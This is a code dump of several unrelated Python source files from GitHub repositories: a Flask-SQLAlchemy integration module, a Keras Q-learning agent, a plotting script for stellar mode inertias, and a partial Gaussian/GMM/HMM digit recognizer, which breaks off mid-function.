statement = property(itemgetter(0))\n parameters = property(itemgetter(1))\n start_time = property(itemgetter(2))\n end_time = property(itemgetter(3))\n context = property(itemgetter(4))\n\n @property\n def duration(self):\n return self.end_time - self.start_time\n\n def __repr__(self):\n return '' % (\n self.statement,\n self.parameters,\n self.duration\n )\n\n\ndef _calling_context(app_path):\n frm = sys._getframe(1)\n while frm.f_back is not None:\n name = frm.f_globals.get('__name__')\n if name and (name == app_path or name.startswith(app_path + '.')):\n funcname = frm.f_code.co_name\n return '%s:%s (%s)' % (\n frm.f_code.co_filename,\n frm.f_lineno,\n funcname\n )\n frm = frm.f_back\n return ''\n\n\nclass _ConnectionDebugProxy(ConnectionProxy):\n \"\"\"Helps debugging the database.\"\"\"\n\n def __init__(self, import_name):\n self.app_package = import_name\n\n def cursor_execute(self, execute, cursor, statement, parameters,\n context, executemany):\n start = _timer()\n try:\n return execute(cursor, statement, parameters, context)\n finally:\n ctx = _request_ctx_stack.top\n if ctx is not None:\n queries = getattr(ctx, 'sqlalchemy_queries', None)\n if queries is None:\n queries = []\n setattr(ctx, 'sqlalchemy_queries', queries)\n queries.append(_DebugQueryTuple((\n statement, parameters, start, _timer(),\n _calling_context(self.app_package))))\n\n\nclass _SignalTrackingMapperExtension(MapperExtension):\n\n def after_delete(self, mapper, connection, instance):\n return self._record(mapper, instance, 
'delete')\n\n def after_insert(self, mapper, connection, instance):\n return self._record(mapper, instance, 'insert')\n\n def after_update(self, mapper, connection, instance):\n return self._record(mapper, instance, 'update')\n\n def _record(self, mapper, model, operation):\n pk = tuple(mapper.primary_key_from_instance(model))\n orm.object_session(model)._model_changes[pk] = (model, operation)\n return EXT_CONTINUE\n\n\nclass _SignalTrackingMapper(Mapper):\n\n def __init__(self, *args, **kwargs):\n extensions = to_list(kwargs.pop('extension', None), [])\n extensions.append(_SignalTrackingMapperExtension())\n kwargs['extension'] = extensions\n Mapper.__init__(self, *args, **kwargs)\n\n\nclass _SignallingSessionExtension(SessionExtension):\n\n def before_commit(self, session):\n d = session._model_changes\n if d:\n before_models_committed.send(session.app, changes=d.values())\n return EXT_CONTINUE\n\n def after_commit(self, session):\n d = session._model_changes\n if d:\n models_committed.send(session.app, changes=d.values())\n d.clear()\n return EXT_CONTINUE\n\n def after_rollback(self, session):\n session._model_changes.clear()\n return EXT_CONTINUE\n\n\nclass _SignallingSession(Session):\n\n def __init__(self, db, autocommit=False, autoflush=False, **options):\n Session.__init__(self, autocommit=autocommit, autoflush=autoflush,\n extension=db.session_extensions,\n bind=db.engine, **options)\n self.app = db.app or _request_ctx_stack.top.app\n self._model_changes = {}\n\n\ndef get_debug_queries():\n \"\"\"In debug mode Flask-SQLAlchemy will log all the SQL queries sent\n to the database. This information is available until the end of request\n which makes it possible to easily ensure that the SQL generated is the\n one expected on errors or in unittesting. If you don't want to enable\n the DEBUG mode for your unittests you can also enable the query\n recording by setting the ``'SQLALCHEMY_RECORD_QUERIES'`` config variable\n to `True`. This is automatically enabled if Flask is in testing mode.\n\n The value returned will be a list of named tuples with the following\n attributes:\n\n `statement`\n The SQL statement issued\n\n `parameters`\n The parameters for the SQL statement\n\n `start_time` / `end_time`\n Time the query started / the results arrived. Please keep in mind\n that the timer function used depends on your platform. These\n values are only useful for sorting or comparing. They do not\n necessarily represent an absolute timestamp.\n\n `duration`\n Time the query took in seconds\n\n `context`\n A string giving a rough estimation of where in your application\n query was issued. The exact format is undefined so don't try\n to reconstruct filename or function name.\n \"\"\"\n return getattr(_request_ctx_stack.top, 'sqlalchemy_queries', [])\n\n\nclass Pagination(object):\n \"\"\"Internal helper class returned by :meth:`BaseQuery.paginate`. You\n can also construct it from any other SQLAlchemy query object if you are\n working with other libraries. 
Additionally it is possible to pass `None`\n as query object in which case the :meth:`prev` and :meth:`next` will\n no longer work.\n \"\"\"\n\n def __init__(self, query, page, per_page, total, items):\n #: the unlimited query object that was used to create this\n #: pagination object.\n self.query = query\n #: the current page number (1 indexed)\n self.page = page\n #: the number of items to be displayed on a page.\n self.per_page = per_page\n #: the total number of items matching the query\n self.total = total\n #: the items for the current page\n self.items = items\n\n @property\n def pages(self):\n \"\"\"The total number of pages\"\"\"\n return int(ceil(self.total / float(self.per_page)))\n\n def prev(self, error_out=False):\n \"\"\"Returns a :class:`Pagination` object for the previous page.\"\"\"\n assert self.query is not None, 'a query object is required ' \\\n 'for this method to work'\n return self.query.paginate(self.page - 1, self.per_page, error_out)\n\n @property\n def prev_num(self):\n \"\"\"Number of the previous page.\"\"\"\n return self.page - 1\n\n @property\n def has_prev(self):\n \"\"\"True if a previous page exists\"\"\"\n return self.page > 1\n\n def next(self, error_out=False):\n \"\"\"Returns a :class:`Pagination` object for the next page.\"\"\"\n assert self.query is not None, 'a query object is required ' \\\n 'for this method to work'\n return self.query.paginate(self.page + 1, self.per_page, error_out)\n\n @property\n def has_next(self):\n \"\"\"True if a next page exists.\"\"\"\n return self.page < self.pages\n\n @property\n def next_num(self):\n \"\"\"Number of the next page\"\"\"\n return self.page + 1\n\n def iter_pages(self, left_edge=2, left_current=2,\n right_current=5, right_edge=2):\n \"\"\"Iterates over the page numbers in the pagination. The four\n parameters control the thresholds how many numbers should be produced\n from the sides. Skipped page numbers are represented as `None`.\n This is how you could render such a pagination in the templates:\n\n .. sourcecode:: html+jinja\n\n {% macro render_pagination(pagination, endpoint) %}\n \n {% endmacro %}\n \"\"\"\n last = 0\n for num in xrange(1, self.pages + 1):\n if num <= left_edge or \\\n (num > self.page - left_current - 1 and \\\n num < self.page + right_current) or \\\n num > self.pages - right_edge:\n if last + 1 != num:\n yield None\n yield num\n last = num\n\n\nclass BaseQuery(orm.Query):\n \"\"\"The default query object used for models. This can be subclassed and\n replaced for individual models by setting the :attr:`~Model.query_class`\n attribute. This is a subclass of a standard SQLAlchemy\n :class:`~sqlalchemy.orm.query.Query` class and has all the methods of a\n standard query as well.\n \"\"\"\n\n def get_or_404(self, ident):\n \"\"\"Like :meth:`get` but aborts with 404 if not found instead of\n returning `None`.\n \"\"\"\n rv = self.get(ident)\n if rv is None:\n abort(404)\n return rv\n\n def first_or_404(self):\n \"\"\"Like :meth:`first` but aborts with 404 if not found instead of\n returning `None`.\n \"\"\"\n rv = self.first()\n if rv is None:\n abort(404)\n return rv\n\n def paginate(self, page, per_page=20, error_out=True):\n \"\"\"Returns `per_page` items from page `page`. By default it will\n abort with 404 if no items were found and the page was larger than\n 1. 
This behavor can be disabled by setting `error_out` to `False`.\n\n Returns an :class:`Pagination` object.\n \"\"\"\n if error_out and page < 1:\n abort(404)\n items = self.limit(per_page).offset((page - 1) * per_page).all()\n if not items and page != 1 and error_out:\n abort(404)\n return Pagination(self, page, per_page, self.count(), items)\n\n\nclass _QueryProperty(object):\n\n def __init__(self, sa):\n self.sa = sa\n\n def __get__(self, obj, type):\n try:\n mapper = orm.class_mapper(type)\n if mapper:\n return type.query_class(mapper, session=self.sa.session())\n except UnmappedClassError:\n return None\n\n\ndef _record_queries(app):\n if app.debug:\n return True\n rq = app.config['SQLALCHEMY_RECORD_QUERIES']\n if rq is not None:\n return rq\n return bool(app.config.get('TESTING'))\n\n\nclass _EngineConnector(object):\n\n def __init__(self, sa, app):\n self._sa = sa\n self._app = app\n self._engine = None\n self._connected_for = None\n self._lock = Lock()\n\n def get_engine(self):\n with self._lock:\n uri = self._app.config['SQLALCHEMY_DATABASE_URI']\n echo = self._app.config['SQLALCHEMY_ECHO']\n if (uri, echo) == self._connected_for:\n return self._engine\n info = make_url(uri)\n options = {'convert_unicode': True}\n self._sa.apply_pool_defaults(self._app, options)\n self._sa.apply_driver_hacks(self._app, info, options)\n if _record_queries(self._app):\n options['proxy'] = _ConnectionDebugProxy(self._app.import_name)\n if echo:\n options['echo'] = True\n self._engine = rv = sqlalchemy.create_engine(info, **options)\n self._connected_for = (uri, echo)\n return rv\n\n\nclass _ModelTableNameDescriptor(object):\n\n def __get__(self, obj, type):\n tablename = type.__dict__.get('__tablename__')\n if not tablename:\n def _join(match):\n word = match.group()\n if len(word) > 1:\n return ('_%s_%s' % (word[:-1], word[-1])).lower()\n return '_' + word.lower()\n tablename = _camelcase_re.sub(_join, type.__name__).lstrip('_')\n setattr(type, '__tablename__', tablename)\n return tablename\n\n\nclass Model(object):\n \"\"\"Baseclass for custom user models.\"\"\"\n\n #: the query class used. The :attr:`query` attribute is an instance\n #: of this class. By default a :class:`BaseQuery` is used.\n query_class = BaseQuery\n\n #: an instance of :attr:`query_class`. Can be used to query the\n #: database for instances of this model.\n query = None\n\n #: arguments for the mapper\n __mapper_cls__ = _SignalTrackingMapper\n\n __tablename__ = _ModelTableNameDescriptor()\n\n\nclass SQLAlchemy(object):\n \"\"\"This class is used to control the SQLAlchemy integration to one\n or more Flask applications. Depending on how you initialize the\n object it is usable right away or will attach as needed to a\n Flask application.\n\n There are two usage modes which work very similar. One is binding\n the instance to a very specific Flask application::\n\n app = Flask(__name__)\n db = SQLAlchemy(app)\n\n The second possibility is to create the object once and configure the\n application later to support it::\n\n db = SQLAlchemy()\n\n def create_app():\n app = Flask(__name__)\n db.init_app(app)\n return app\n\n The difference between the two is that in the first case methods like\n :meth:`create_all` and :meth:`drop_all` will work all the time but in\n the second case a :meth:`flask.Flask.request_context` has to exist.\n\n By default Flask-SQLAlchemy will apply some backend-specific settings\n to improve your experience with them. As of SQLAlchemy 0.6 SQLAlchemy\n will probe the library for native unicode support. 
If it detects\n unicode it will let the library handle that, otherwise do that itself.\n Sometimes this detection can fail in which case you might want to set\n `use_native_unicode` (or the ``SQLALCHEMY_NATIVE_UNICODE`` configuration\n key) to `False`. Note that the configuration key overrides the\n value you pass to the constructor.\n\n Additionally this class also provides access to all the SQLAlchemy\n functions from the :mod:`sqlalchemy` and :mod:`sqlalchemy.orm` modules.\n So you can declare models like this::\n\n class User(db.Model):\n username = db.Column(db.String(80), unique=True)\n pw_hash = db.Column(db.String(80))\n\n You may also define your own SessionExtension instances as well when\n defining your SQLAlchemy class instance. You may pass your custom instances\n to the `session_extensions` keyword. This can be either a single\n SessionExtension instance, or a list of SessionExtension instances. In the \n following use case we use the VersionedListener from the SQLAlchemy\n versioning examples.::\n\n from history_meta import VersionedMeta, VersionedListener\n\n app = Flask(__name__)\n db = SQLAlchemy(app, session_extensions=[VersionedListener()])\n\n class User(db.Model):\n __metaclass__ = VersionedMeta\n username = db.Column(db.String(80), unique=True)\n pw_hash = db.Column(db.String(80))\n\n The `session_options` parameter can be used to override session\n options. If provided it's a dict of parameters passed to the\n session's constructor.\n\n .. versionadded:: 0.10\n The `session_options` parameter was added.\n \"\"\"\n\n def __init__(self, app=None, use_native_unicode=True,\n session_extensions=None, session_options=None):\n self.use_native_unicode = use_native_unicode\n self.session_extensions = to_list(session_extensions, []) + \\\n [_SignallingSessionExtension()]\n\n self.session = _create_scoped_session(self, session_options)\n\n self.Model = declarative_base(cls=Model, name='Model')\n self.Model.query = _QueryProperty(self)\n\n self._engine_lock = Lock()\n\n if app is not None:\n self.app = app\n self.init_app(app)\n else:\n self.app = None\n\n _include_sqlalchemy(self)\n\n @property\n def metadata(self):\n \"\"\"Returns the metadata\"\"\"\n return self.Model.metadata\n\n def init_app(self, app):\n \"\"\"This callback can be used to initialize an application for the\n use with this database setup. 
Never use a database in the context\n of an application not initialized that way or connections will\n leak.\n \"\"\"\n app.config.setdefault('SQLALCHEMY_DATABASE_URI', 'sqlite://')\n app.config.setdefault('SQLALCHEMY_NATIVE_UNICODE', None)\n app.config.setdefault('SQLALCHEMY_ECHO', False)\n app.config.setdefault('SQLALCHEMY_RECORD_QUERIES', None)\n app.config.setdefault('SQLALCHEMY_POOL_SIZE', None)\n app.config.setdefault('SQLALCHEMY_POOL_TIMEOUT', None)\n app.config.setdefault('SQLALCHEMY_POOL_RECYCLE', None)\n\n @app.after_request\n def shutdown_session(response):\n self.session.remove()\n return response\n\n def apply_pool_defaults(self, app, options):\n def _setdefault(optionkey, configkey):\n value = app.config[configkey]\n if value is not None:\n options[optionkey] = value\n _setdefault('pool_size', 'SQLALCHEMY_POOL_SIZE')\n _setdefault('pool_timeout', 'SQLALCHEMY_POOL_TIMEOUT')\n _setdefault('pool_recycle', 'SQLALCHEMY_POOL_RECYCLE')\n\n def apply_driver_hacks(self, app, info, options):\n if info.drivername == 'mysql':\n info.query.setdefault('charset', 'utf8')\n options.setdefault('pool_size', 10)\n options.setdefault('pool_recycle', 7200)\n elif info.drivername == 'sqlite':\n pool_size = options.get('pool_size')\n # we go to memory and the pool size was explicitly set to 0\n # which is fail. Let the user know that\n if info.database in (None, '', ':memory:'):\n if pool_size == 0:\n raise RuntimeError('SQLite in memory database with an '\n 'empty queue not possible due to data '\n 'loss.')\n # if pool size is None or explicitly set to 0 we assume the\n # user did not want a queue for this sqlite connection and\n # hook in the null pool.\n elif not pool_size:\n from sqlalchemy.pool import NullPool\n options['poolclass'] = NullPool\n\n unu = app.config['SQLALCHEMY_NATIVE_UNICODE']\n if unu is None:\n unu = self.use_native_unicode\n if not unu:\n options['use_native_unicode'] = False\n\n @property\n def engine(self):\n \"\"\"Gives access to the engine. If the database configuration is bound\n to a specific application (initialized with an application) this will\n always return a database connection. 
If however the current application\n        is used this might raise a :exc:`RuntimeError` if no application is\n        active at the moment.\n        \"\"\"\n        with self._engine_lock:\n            if self.app is not None:\n                app = self.app\n            else:\n                ctx = _request_ctx_stack.top\n                if ctx is not None:\n                    app = ctx.app\n                else:\n                    raise RuntimeError('application not registered on db '\n                                       'instance and no application bound '\n                                       'to current context')\n            connector = getattr(app, '_sqlalchemy_connector', None)\n            if connector is None:\n                connector = _EngineConnector(self, app)\n                app._sqlalchemy_connector = connector\n            return connector.get_engine()\n\n    def create_all(self):\n        \"\"\"Creates all tables.\"\"\"\n        self.Model.metadata.create_all(bind=self.engine)\n\n    def drop_all(self):\n        \"\"\"Drops all tables.\"\"\"\n        self.Model.metadata.drop_all(bind=self.engine)\n\n    def reflect(self):\n        \"\"\"Reflects tables from the database.\"\"\"\n        self.Model.metadata.reflect(bind=self.engine)\n\n    def __repr__(self):\n        app = None\n        if self.app is not None:\n            app = self.app\n        else:\n            ctx = _request_ctx_stack.top\n            if ctx is not None:\n                app = ctx.app\n        return '<%s engine=%r>' % (\n            self.__class__.__name__,\n            app and app.config['SQLALCHEMY_DATABASE_URI'] or None\n        )\n","repo_name":"yxm0513/flask-ims","sub_path":"flaskext/sqlalchemy.py","file_name":"sqlalchemy.py","file_ext":"py","file_size_in_byte":22210,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"42324813060","text":"#import gym\nimport numpy as np\nfrom random import randint\n#from gym.spaces import Box, Discrete\nfrom keras.models import Model\nfrom keras.layers import Input, Dense, Lambda,merge\nfrom keras.layers.normalization import BatchNormalization\nfrom keras import backend as K\nfrom keras.models import Sequential\nfrom numpy.random import *\nimport argparse\nimport OSC\nimport matplotlib.pyplot as plt\n\n\nclass QLearn:\n    __BATCH_SIZE=100\n    __EXPLORATION=0.001\n    __NUM_INPUT=4\n    __NUM_OUTPUT=10\n    __MIN_TRAIN=100\n    __TRAIN_REPEAT=100\n    __GAMMA=0.90\n    __DISPLAY=True\n    __NUM_ACTIONS=5\n    prestates = []\n    actions = []\n    rewards = []\n    poststates = []\n    terminals = []\n    total_reward = 0\n    episode_reward=0\n    observation = np.array([0,0,0,0])\n    action =[0]\n\n\n    #env = gym.make('Pendulum-v0')\n\n\n    def __init__(self):\n        status,action_0,action_1,action_2,action_3,out = self.createLayers(self.__NUM_INPUT,self.__NUM_OUTPUT)\n        ###########make calculation Model#################\n        self.model = Model(input=[status,action_0,action_1,action_2,action_3], output=out)\n\n        self.model.summary()\n        status,action_0,action_1,action_2,action_3,out = self.createLayers(self.__NUM_INPUT,self.__NUM_OUTPUT)\n        #target_model = Model(input=x, output=z)\n        #target_model.set_weights(self.model.get_weights())\n        self.model.compile(optimizer='adam', loss='mse')\n\n\n    def createLayers(self,num_input,num_output):\n        #x = Input(shape=env.observation_space.shape)\n        #i=3\n        status = Input(shape=(num_input,),name='x')\n        action_0 = Input(shape=(5,), name='a0')\n        action_1 = Input(shape=(5,), name='a1')\n        action_2 = Input(shape=(5,), name='a2')\n        action_3 = Input(shape=(5,), name='a3')\n\n        x = merge([status,action_0,action_1,action_2,action_3], mode='concat')\n\n        #x = Input(shape=(num_input,))#########input_NUM\n\n        h = x\n        h = Dense(64, activation='tanh')(h)\n        h = Dense(64, activation='tanh')(h)\n        h = Dense(64, activation='tanh')(h)\n        h = Dense(64, activation='tanh')(h)\n\n        y = Dense(64,input_shape=(64,))(h)\n        out = Dense(num_output,input_shape=(64,))(y)\n\n\n        #z = Dense(num_output,input_shape=(64,))(y)\n        #print('z:',z)\n        #return x, z\n        return status,action_0,action_1,action_2,action_3,out\n\n###########################################################\n###########################################################\n\n    def resetParametors(self):\n        ######reset per repetition\n        #self.env.reset()\n        self.episode_reward = 0\n\n    def getAction(self):\n\n        if np.random.random() < self.__EXPLORATION:\n            for i in range(self.__NUM_ACTIONS):\n                self.action[i]=self.__getRandomAction()\n        else:\n            s = np.array([self.observation])\n            q = self.model.predict(s, batch_size=10)##########\n            self.action = [np.argmax(q[0])]\n            print(\"Action:\",self.action)\n            print(q)\n\n        return self.action\n\n\n    def __setQ(self,NUM_ACTION,NUM_INPUT):\n        # NOTE: a0..a3 are integer indices here; the merged model expects one-hot\n        # (5,)-shaped action vectors, so they would still need encoding before predict()\n        q = []\n        s = np.array([self.observation])\n        allCase=int(NUM_INPUT**NUM_ACTION)\n        for i in range(allCase):\n            a0,a1,a2,a3=self.__getActionFromNum(i,NUM_ACTION,NUM_INPUT)\n            __q = self.model.predict([s,a0,a1,a2,a3], batch_size=10)\n            q.append(__q)\n        self.action = [np.argmax(q[0])]\n\n\n    def __getActionFromNum(self,num,NUM_ACTION,NUM_INPUT):\n        a0= num% NUM_INPUT\n        num=int(num/NUM_INPUT)\n        a1=num% NUM_INPUT\n        num=int(num/NUM_INPUT)\n        a2=num% NUM_INPUT\n        num=int(num/NUM_INPUT)\n        a3=num% NUM_INPUT\n        return a0,a1,a2,a3\n\n\n\n    def __getRandomAction(self):\n        # randint is inclusive at both ends, so cap at NUM_OUTPUT - 1\n        action=[randint(0,self.__NUM_OUTPUT - 1)]\n        print(action)\n        return action\n\n\n    def preProcces(self,action,observation):\n        self.prestates.append(observation)\n        self.actions.append(action)\n\n###########################################################\n###########################################################\n\n    def setStatus(self,observation,reward,done,info):\n        self.rewards.append(reward)\n        self.poststates.append(observation)\n        self.terminals.append(done)\n        self.episode_reward += reward\n        self.observation=observation\n        #print(type(self.poststates))\n\n        self.printStatus(observation,reward,done,info)\n\n    def printStatus(self,observation,reward,done,info):\n        print(\"observation:\",observation)\n        print(\"reward:\",reward)\n        print(\"done:\",done)\n        print(\"info:\",info)\n        print (\"rewards:\",self.episode_reward)\n\n\n    def postProcces(self):\n        if len(self.prestates) > self.__MIN_TRAIN:\n            indexes=self.__getIndexes()\n            self.__calculateQLearning(indexes)\n\n\n    def __getIndexes(self):\n        for k in range(self.__TRAIN_REPEAT):\n            if len(self.prestates) > self.__BATCH_SIZE:\n                indexes = np.random.choice(len(self.prestates), size=self.__BATCH_SIZE)\n            else:\n                indexes = range(len(self.prestates))\n        return indexes\n\n\n    def __calculateQLearning(self,indexes):\n        #########prediction per repetition################\n        qpre = self.model.predict(np.array(self.prestates)[indexes])\n        qpost = self.model.predict(np.array(self.poststates)[indexes])\n\n        #print(\"prestates:\",self.prestates)\n        #print(\"poststates:\",self.poststates)\n\n        for i in range(len(indexes)):\n            actionIndex=self.actions[indexes[i]]\n            if self.terminals[indexes[i]]:\n                qpre[i, actionIndex] = self.rewards[indexes[i]]\n            else:\n                qpre[i, actionIndex] = self.rewards[indexes[i]] + self.__GAMMA * np.amax(qpost[i])\n\n        ##########Single gradient update over one batch of samples.###############\n        #print (qpre)\n        loss=self.model.train_on_batch(np.array(self.prestates)[indexes], qpre)\n        print (\"loss:\",loss)\n\n#############################################################\n##############################################################\n    #def render(self):\n        
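# NOTE: render() is left commented out, presumably because this agent runs\n        # headless over OSC and the gym environment above is also commented out.\n        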
#self.env.render()\n","repo_name":"y1sakamoto/Study","sub_path":"QLearnOSCBullet0227/QLearn4Out0228.py","file_name":"QLearn4Out0228.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35693279714","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport sys\n\ninputFileName = sys.argv[1]\n\nl, n, f, m = np.loadtxt(fname=inputFileName,usecols=(0,1,2,3),unpack=True)\nmax_l = int(l[len(l)-1] + 1)\n\n# # Load frequencies and mode inertias into frequencies array.\n# # frequencies is an array of arrays corresponding to l modes\n# # each l mode array holds an array corresponding to n modes\n# # each n mode array holds the frequency, and the mode inertia\n# frequencies = []\n# frequencies.append([])\n# l = 0\n# for i in range(len(data[0])):\n# if (data[0][i] > l):\n# frequencies.append([])\n# l = l + 1\n# frequencies[l].append( [data[2][i], data[3][i] ])\n\nl_modes = []\nfor i in range(max_l):\n l_modes.append([[],[]])\n\nfor i in range(len(l)):\n if (n[i] > 0):\n print(l[i])\n l_modes[int(l[i])][0].append(f[i])\n l_modes[int(l[i])][1].append(m[i])\n\nfor i in range(max_l):\n plt.plot(l_modes[i][0],l_modes[i][1],'.')\n\n# for i in range(len(frequencies)):\n# l_modes.append([[],[]])\n# for j in range(len(frequencies[i])):\n# l_modes[i][0].append(frequencies[i][j][0])\n# l_modes[i][1].append(frequencies[i][j][1])\n# plt.plot(l_modes[i][0],l_modes[i][1],'.')\n\nplt.axes().set_yscale('log')\nplt.ylabel(\"Mode inertia\")\nplt.xlabel(r\"Frequency $\\nu$/Hz\")\nplt.savefig(\"ModeInertiasExample\")\n","repo_name":"kroffo/MPS-Internship-Code","sub_path":"bumpAnalysis/.adipls-freq-files/plotInertias.py","file_name":"plotInertias.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30580531387","text":"import argparse\nimport logging\nimport numpy as np\n\n\ndef elog(x):\n res = np.log(x, where=(x != 0))\n res[np.where(x == 0)] = -(10.0 ** 8)\n return (res)\n\n\ndef get_data_dict(data):\n data_dict = {}\n for line in data:\n if \"[\" in line:\n key = line.split()[0]\n mat = []\n elif \"]\" in line:\n line = line.split(']')[0]\n mat.append([float(x) for x in line.split()])\n data_dict[key] = np.array(mat)\n else:\n mat.append([float(x) for x in line.split()])\n return data_dict\n\n\ndef logSumExp(x, axis=None, keepdims=False):\n x_max = np.max(x, axis=axis, keepdims=keepdims)\n x_diff = x - x_max\n sumexp = np.exp(x_diff).sum(axis=axis, keepdims=keepdims)\n return (x_max + np.log(sumexp))\n\n\ndef exp_normalize(x, axis=None, keepdims=False):\n b = x.max(axis=axis, keepdims=keepdims)\n y = np.exp(x - b)\n return y / y.sum(axis=axis, keepdims=keepdims)\n\n\ndef compute_ll(data, mu, r):\n # Compute log-likelihood of a single n-dimensional data point, given a single\n # mean and variance\n ll = (- 0.5 * elog(r) - np.divide(\n np.square(data - mu), 2 * r) - 0.5 * np.log(2 * np.pi)).sum()\n return ll\n\n\ndef forward(pi, a, o, mu, r):\n \"\"\"\n Computes forward log-probabilities of all states\n at all time steps.\n Inputs:\n pi: initial probability over states\n a: transition matrix\n o: observed n-dimensional data sequence\n mu: means of Gaussians for each state\n r: variances of Gaussians for each state\n \"\"\"\n T = o.shape[0]\n J = mu.shape[0]\n\n log_alpha = np.zeros((T, J))\n log_alpha[0] = elog(pi)\n\n log_alpha[0] += np.array([compute_ll(o[0], mu[j], r[j])\n for j in range(J)])\n\n for t in 
range(1, T):\n for j in range(J):\n log_alpha[t, j] = compute_ll(o[t], mu[j], r[j]) + logSumExp(elog(a[:, j].T) + log_alpha[t - 1])\n\n return log_alpha\n\n\ndef backward(a, o, mu, r):\n \"\"\"\n Computes backward log-probabilities of all states\n at all time steps.\n Inputs:\n a: transition matrix\n o: observed n-dimensional data\n mu: means of Gaussians for each state\n r: variances of Gaussians for each state\n \"\"\"\n T = o.shape[0]\n J = mu.shape[0]\n log_beta = np.zeros((T, J))\n\n log_a = elog(a)\n\n for t in reversed(range(T - 1)):\n for i in range(J):\n x = []\n for j in range(J):\n x.append(compute_ll(o[t + 1], mu[j], r[j]) + log_beta[t + 1, j] + log_a[i, j])\n\n log_beta[t, i] = logSumExp(np.array(x))\n\n return log_beta\n\n\nclass SingleGauss():\n def __init__(self):\n # Basic class variable initialized, feel free to add more\n self.dim = None\n self.mu = None\n self.r = None\n\n def train(self, data):\n # Function for training single modal Gaussian\n T, self.dim = data.shape\n\n self.mu = np.mean(data, axis=0)\n self.r = np.mean(np.square(np.subtract(data, self.mu)), axis=0)\n return\n\n def loglike(self, data_mat):\n # Function for calculating log likelihood of single modal Gaussian\n lls = [compute_ll(frame, self.mu, self.r) for frame in data_mat.tolist()]\n ll = np.sum(np.array(lls))\n return ll\n\n\nclass GMM():\n\n def __init__(self, sg_model, ncomp):\n # Basic class variable initialized, feel free to add more\n self.mu = np.tile(sg_model.mu, (ncomp, 1))\n for k in range(ncomp):\n eps_k = np.random.randn()\n self.mu[k] += 0.01 * eps_k * np.sqrt(sg_model.r)\n self.r = np.tile(sg_model.r, (ncomp, 1))\n self.omega = np.ones(ncomp) / ncomp\n self.ncomp = ncomp\n\n def e_step(self, data):\n gamma = np.zeros((data.shape[0], self.ncomp))\n for t in range(data.shape[0]):\n log_gamma_t = np.log(self.omega)\n for k in range(self.ncomp):\n log_gamma_t[k] += compute_ll(data[t], self.mu[k], self.r[k])\n gamma[t] = exp_normalize(log_gamma_t)\n return gamma\n\n def m_step(self, data, gamma):\n self.omega = np.sum(gamma, axis=0) / np.sum(gamma)\n\n denom = np.sum(gamma, axis=0, keepdims=True).T\n\n mu_num = np.zeros_like(self.mu)\n for k in range(self.ncomp):\n mu_num[k] = np.sum(np.multiply(data, np.expand_dims(gamma[:, k], axis=1)), axis=0)\n\n self.mu = np.divide(mu_num, denom)\n\n r_num = np.zeros_like(self.r)\n for k in range(self.ncomp):\n r_num[k] = np.sum(np.multiply(np.square(np.subtract(data, self.mu[k])),\n np.expand_dims(gamma[:, k], axis=1)), axis=0)\n\n self.r = np.divide(r_num, denom)\n return\n\n def train(self, data):\n # Function for training single modal Gaussian\n gamma = self.e_step(data)\n self.m_step(data, gamma)\n\n def loglike(self, data_mat):\n # Function for calculating log likelihood of single modal Gaussian\n ll = 0\n for t in range(data_mat.shape[0]):\n ll_t = np.array([np.log(self.omega[k]) + compute_ll(data_mat[t], self.mu[k], self.r[k])\n for k in range(self.ncomp)])\n ll_t = logSumExp(ll_t)\n ll += ll_t\n return ll\n\n\nclass HMM():\n\n def __init__(self, sg_model, nstate):\n # Basic class variable initialized, feel free to add more\n self.pi = np.zeros(nstate)\n self.pi[0] = 1\n self.nstate = nstate\n\n self.mu = np.tile(sg_model.mu, (nstate, 1))\n self.r = np.tile(sg_model.r, (nstate, 1))\n\n def initStates(self, data):\n self.states = []\n for data_u in data:\n T = data_u.shape[0]\n state_seq = np.array([self.nstate * t / T for t in range(T)], dtype=int)\n self.states.append(state_seq)\n\n def viterbi(self, data):\n for u, data_u in 
enumerate(data):\n T = data_u.shape[0]\n J = self.nstate\n s_hat = np.zeros(T, dtype=int)\n\n log_delta = np.zeros((T, J))\n psi = np.zeros((T, J))\n\n log_delta[0] = elog(self.pi)\n for j in range(J):\n log_delta[0, j] += compute_ll(data_u[0], self.mu[j], self.r[j])\n\n log_A = elog(self.A)\n # print(self.A)\n for t in range(1, T):\n for j in range(J):\n temp = np.zeros(J)\n for i in range(J):\n temp[i] = log_delta[t - 1, i] + log_A[i, j] + compute_ll(data_u[t], self.mu[j], self.r[j])\n log_delta[t, j] = np.max(temp)\n psi[t, j] = np.argmax(log_delta[t - 1] + log_A[:, j])\n\n s_hat[T - 1] = np.argmax(log_delta[T - 1])\n\n for t in reversed(range(T - 1)):\n s_hat[t] = psi[t + 1, s_hat[t + 1]]\n\n self.states[u] = s_hat\n\n def m_step(self, data):\n\n self.A = np.zeros((self.nstate, self.nstate))\n\n gamma_0 = np.zeros(self.nstate)\n gamma_1 = np.zeros((self.nstate, data[0].shape[1]))\n gamma_2 = np.zeros((self.nstate, data[0].shape[1]))\n\n for u, data_u in enumerate(data):\n T = data_u.shape[0]\n seq = self.states[u]\n gamma = np.zeros((T, self.nstate))\n\n for t, j in enumerate(seq[:-1]):\n self.A[j, seq[t + 1]] += 1\n gamma[t, j] = 1\n\n gamma[T - 1, self.nstate - 1] = 1\n gamma_0 += np.sum(gamma, axis=0)\n\n for t in range(T):\n gamma_1[seq[t]] += data_u[t]\n gamma_2[seq[t]] += np.square(data_u[t])\n\n gamma_0 = np.expand_dims(gamma_0, axis=1)\n self.mu = gamma_1 / gamma_0\n self.r = (gamma_2 - np.multiply(gamma_0, self.mu ** 2)) / gamma_0\n\n for j in range(self.nstate):\n self.A[j] /= np.sum(self.A[j])\n\n def train(self, data, iter):\n # Function for training single modal Gaussian\n if (iter == 0):\n self.initStates(data)\n self.m_step(data)\n self.viterbi(data)\n\n def loglike(self, data):\n # Function for calculating log likelihood of single modal Gaussian\n T = data.shape[0]\n log_alpha_t = forward(self.pi, self.A, data, self.mu, self.r)[T - 1]\n ll = logSumExp(log_alpha_t)\n\n return ll\n\n\ndef sg_train(digits, train_data):\n model = {}\n for digit in digits:\n model[digit] = SingleGauss()\n\n for digit in digits:\n data = np.vstack([train_data[id] for id in train_data.keys() if digit in id.split('_')[1]])\n logging.info(\"process %d data for digit %s\", len(data), digit)\n 